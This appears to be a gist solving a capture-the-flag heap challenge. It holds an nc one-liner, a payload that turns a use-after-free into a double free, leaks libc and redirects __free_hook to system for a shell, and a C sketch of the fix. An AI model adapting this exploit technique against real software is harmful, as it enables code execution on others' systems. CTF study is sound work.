@hkraw
Last active March 7, 2021 23:27
```exploit.sh
#!/bin/bash
(cat payload; cat)|nc pynotes.darkarmy.xyz 32769
```
```payload
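# libc offsets used by this payload
unsortedbinoffset = 0x3ebca0
aaa = 0x4f4e0  # written into free_hook; the note below says free_hook -> system
freehook = 0x3ed8e8
new(0,0xf0,0x1)
# The same note is deleted repeatedly (UAF -> double free)
for i in range(6):
    delete(0)
delete(0)
delete(0)
# view() on the freed note returns a libc pointer
libcleak = view(0)
libc = libcleak-unsortedbinoffset
print(f'Libc: {libc:x}')
new(1,0xc8,0xdeadbeef)
delete(1)
delete(1)
new(2,0xc8,libc+freehook)
new(3,0xc8,0xdeadbeef)
new(4,0xc8,libc+aaa)
# print() frees the string it is given (see the note below)
print("/bin/sh")
DARKCTF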
```
"""
The challenge was a simple heap exploitation challenge. I gave the Python extension module `_notes`. The bug?
A UAF, which makes a double free possible.
Just be careful with what sizes you choose and how you write the exploit. Nothing new. Somehow print() does a free on the string we give.
free_hook -> system and print("/bin/sh")
"""
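
A typical cause of the use-after-free and double free described in the note is a delete path that frees a note but leaves its pointer in the slot. The sketch below is an added example, not the challenge's `_notes` source (which the gist does not include): the slot table, `MAX_NOTES`, `note_new`, `note_delete` and `note_view` are hypothetical names modelled on the `new`/`delete`/`view` calls in the payload, showing the unsafe delete beside a version that clears the slot.

```c
#include <stdint.h>
#include <stdlib.h>

#define MAX_NOTES 16

/* Hypothetical slot table; the real _notes layout is not shown on the page. */
static uint64_t *notes[MAX_NOTES];

/* new(idx, size, value): allocate a note and store one 64-bit value in it. */
int note_new(size_t idx, size_t size, uint64_t value) {
    if (idx >= MAX_NOTES || size < sizeof(uint64_t) || notes[idx] != NULL)
        return -1;
    notes[idx] = calloc(1, size);
    if (notes[idx] == NULL)
        return -1;
    notes[idx][0] = value;
    return 0;
}

/* Vulnerable pattern (shown for contrast, never called here): the slot keeps
 * its pointer after free(), so a later delete or view on the same index
 * operates on freed memory. */
void note_delete_vulnerable(size_t idx) {
    if (idx < MAX_NOTES)
        free(notes[idx]);   /* dangling pointer stays in notes[idx] */
}

/* Hardened delete: refuse empty slots and clear the pointer after free(). */
int note_delete(size_t idx) {
    if (idx >= MAX_NOTES || notes[idx] == NULL)
        return -1;
    free(notes[idx]);
    notes[idx] = NULL;
    return 0;
}

/* Hardened view: only live notes can be read. */
int note_view(size_t idx, uint64_t *out) {
    if (idx >= MAX_NOTES || notes[idx] == NULL)
        return -1;
    *out = notes[idx][0];
    return 0;
}
```

With the slot cleared on delete, a second `delete` or a `view` on the same index is rejected instead of reaching the allocator with a stale pointer.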